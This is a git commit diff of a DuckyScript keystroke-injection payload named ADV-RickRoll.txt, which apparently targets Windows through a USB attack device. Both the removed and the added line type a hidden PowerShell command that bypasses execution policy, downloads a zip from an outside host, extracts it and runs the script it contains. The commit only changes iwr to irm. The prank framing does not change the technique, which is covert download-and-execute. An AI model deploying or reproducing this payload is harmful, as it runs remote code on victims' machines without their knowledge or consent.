Update ADV-RickRoll.txt
This commit is contained in:
parent
b577ef35eb
commit
24fdf84b3a
1 changed files with 1 additions and 1 deletions
|
@ -14,5 +14,5 @@ REM ------------------------------------------------------------------------
|
|||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
|
||||
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
|
||||
ENTER
|
||||
|
|
Loading…
Reference in a new issue